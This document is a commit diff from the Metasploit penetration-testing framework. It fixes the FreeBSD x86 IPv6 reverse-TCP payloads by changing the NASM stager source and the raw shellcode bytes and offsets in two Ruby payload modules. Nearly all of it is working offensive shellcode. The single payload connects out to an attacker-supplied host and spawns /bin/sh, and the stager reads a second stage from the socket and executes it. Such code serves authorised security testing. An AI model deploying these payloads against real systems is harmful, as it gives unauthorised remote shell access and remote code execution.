Fix up reverse_tcp ipv6 stager for freebsd

2012-02-01 01:41:24 -06:00 · 2012-02-01 01:41:24 -06:00 · 0c2a18d765
parent 29d8feaa24
commit 0c2a18d765
3 changed files with 38 additions and 20 deletions
--- a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
+++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
@ -76,10 +76,10 @@ ipv6_address:
 	db 28          ; sa_family_t     sin6_family;    /* AF_INET6 */
 	dw 0xbfbf      ; in_port_t       sin6_port;      /* Transport layer port # */
 	dd 0           ; uint32_t        sin6_flowinfo;  /* IP6 flow information */
-	dd 0x43424140  ; struct in6_addr sin6_addr;      /* IP6 address */
-	dd 0x48474645
-	dd 0x4d4b4a49
-	dd 0x51504f4e
+	dd 0           ; struct in6_addr sin6_addr;      /* IP6 address */
+	dd 0
+	dd 0
+	dd 0x01000000  ; default to ::1
 	dd 0           ; uint32_t        sin6_scope_id;  /* scope zone index */

 skip_bounce:
@ -87,9 +87,26 @@ skip_bounce:
 %ifndef USE_SINGLE_STAGE

 read:
-	mov  al, 0x3
-	mov  byte [ecx - 0x3], 0x10
-	int  0x80
-	ret
+	push byte 0x10
+	pop edx
+	shl edx, 8
+	sub esp, edx
+	mov ecx, esp ; Points to 4096 stack buffer
+	
+	push edx     ; Length
+	push ecx     ; Buffer
+	
+%ifdef FD_REG_EBX
+	push ebx     ; Socket
+%else
+	push edi     ; Socket
+%endif	
+
+	push ecx     ; Buffer to Return
+	
+	mov al, 0x3	
+	int 0x80     ; read(socket, &buff, 4096)
+	
+	ret          ; Return

 %endif
--- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb
+++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb
@ -35,18 +35,17 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							'LHOST'    => [ 43, 'ADDR6' ],
+							'LHOST'    => [ 42, 'ADDR6' ],
 							'LPORT'    => [ 36, 'n'    ],
-							'SCOPEID'  => [ 59, 'V'    ]
+							'SCOPEID'  => [ 58, 'V'    ]
 						},
 					'Payload' =>
 						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
-						"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + 
-						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + 
-						"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + 
+						"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
+						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+						"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
 						"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
-						"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" 
-
+						"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"					
 				}
 		))
 		register_options([
--- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb
+++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb
@ -45,16 +45,18 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							'LHOST'    => [ 43, 'ADDR6' ],
+							'LHOST'    => [ 42, 'ADDR6' ],
 							'LPORT'    => [ 36, 'n'    ],
-							'SCOPEID'  => [ 59, 'V'    ]
+							'SCOPEID'  => [ 58, 'V'    ]
 						},
 					'Payload' =>
+					
 						"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
 						"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
-						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
-						"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" +
-						"\xc6\x41\xfd\x10\xcd\x80\xc3"
+						"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+						"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
+						"\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
+						"\xc3"
 				}
 			))
 		register_options([